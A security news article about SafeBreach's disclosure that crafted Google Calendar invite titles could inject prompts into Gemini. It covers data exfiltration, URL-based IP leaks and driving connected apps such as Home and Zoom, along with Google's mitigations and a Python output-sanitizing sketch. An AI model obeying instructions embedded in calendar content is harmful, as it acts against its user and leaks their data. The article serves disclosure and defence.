
A Google Calendar Flaw Could Allow Hijacking Gemini Via Malicious Invites

by Abeerah Hashim

Researchers discovered a major security flaw in Google Calendar that could allow hijacking Gemini agents via malicious invites. Google patched the flaw following the bug report, ensuring users’ security.

Malicious Invites Could Exploit Google Calendar Flaw To Leak Data

Researchers from SafeBreach discovered a serious vulnerability in Google Calendar that could risk users’ security. As elaborated in their blog post, the security flaw could allow an attacker to hijack Gemini agents on the target device via maliciously crafted Google Calendar invites. In turn, this would allow the attacker to access sensitive data via Gemini without requiring user interaction.

Briefly, the attack begins when the attacker sends a malicious Calendar invite to the target user. The attack involves embedding the malicious prompt within the invite’s event title, so it can be pulled up after the target user asks Gemini about the calendar invites.

Because Gemini treats the malicious prompt as part of its context, it executes the prompt and performs the requested action without recognizing the intent. The prompt could instruct Gemini to perform any action the attacker chooses, such as meddling with Calendar events, extracting the user’s IP address via a URL, or interacting with other agents, such as Google Home, Messages, Phone, or other applications like Zoom, to perform activities like joining a call or fetching data without user input.

The following diagram illustrates the attack flow.

[Figure: Attack flow exploiting Gemini via Google Calendar invites. Source: SafeBreach]

In their study, the researchers demonstrated “context poisoning” – a technique where the LLM is tricked into considering the entire conversation history by sending one query at a time. Injecting a malicious instruction into a long conversation would trick the model into executing the activity. The researchers conducted various types of attacks this way, such as spamming the user, generating hateful content, invoking tools and apps, visiting URLs, and exfiltrating data.

Google Deployed Mitigations

Following the researchers’ report, Google acknowledged their efforts and deployed mitigation strategies to prevent promptware attacks. According to their blog post published in June 2025, Google strengthened the latest Gemini models (v2.5 and later) with layered defense strategies to prevent promptware. These include:

  1. Prompt injection content classifiers: The model analyzes the instructions and avoids responding to malicious instructions.
  2. Security thought reinforcement: When part of the input is detected as malicious instructions, as in prompt injection attacks, the model focuses only on the task and ignores the malicious instructions.
  3. Markdown sanitization and suspicious URL redaction: The model analyzes external URLs and removes them from the output upon detecting malicious links.
  4. User confirmation framework: For instructions including suspicious actions, like deleting Calendar events, the model asks for user confirmation before performing the action.
  5. End-user security mitigation notifications: Users receive notifications highlighting Gemini’s activities upon detecting potentially malicious elements, such as the removal of suspicious URLs.
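
The sketch below illustrates the idea behind items 3 and 5: sanitizing an assistant's response before it is rendered and collecting what was removed so the user can be notified. It is an added example, not Google's implementation; the allowlist, the function names and the sample response are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts the assistant may link to; a real system would use URL reputation.
ALLOWED_HOSTS = {"calendar.google.com", "meet.google.com"}
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"(?<!!)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")
BARE_URL = re.compile(r"https?://[^\s<>)\]]+", re.IGNORECASE)

def host_allowed(url):
    """True only for https URLs, without userinfo, on an allowlisted host."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return False
    if parts.scheme.lower() != "https" or parts.username or parts.password:
        return False
    return (parts.hostname or "").lower().rstrip(".") in ALLOWED_HOSTS

def sanitize_output(text):
    """Return (clean_text, redacted_urls) for a model response."""
    redacted = []

    def drop_image(m):
        # A renderer fetches images with no click, so images are always removed.
        redacted.append(m.group(2))
        return "(image removed)"

    def check_link(m):
        if host_allowed(m.group(2)):
            return m.group(0)
        redacted.append(m.group(2))
        return f"{m.group(1)} [link removed]"

    def check_bare(m):
        if host_allowed(m.group(0)):
            return m.group(0)
        redacted.append(m.group(0))
        return "[suspicious link removed]"

    for pattern, handler in ((MD_IMAGE, drop_image), (MD_LINK, check_link),
                             (BARE_URL, check_bare)):
        text = pattern.sub(handler, text)
    return text, redacted  # redacted feeds the end-user notification

if __name__ == "__main__":
    # Constructed sample response influenced by an injected event title.
    sample = ("Next event at 10:00. ![s](https://attacker.example/p.png?d=x) "
              "Join [Meet](https://meet.google.com/abc-defg-hij) "
              "or [details](http://attacker.example/t)")
    print(sanitize_output(sample))
```
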

Promptware Threats Are Rising

The report from SafeBreach, according to the researchers, isn’t specific to Gemini. Instead, it indicates the widespread impact of a rising threat in the cybersecurity world: promptware. As AI usage becomes common, timely mitigation of promptware threats becomes even more important.

Nonetheless, SafeBreach isn’t the first to point out this threat. In 2024, a team of researchers shared a detailed research paper about promptware threats impacting generative AI apps. The researchers also proposed various mitigation strategies to avoid these threats.
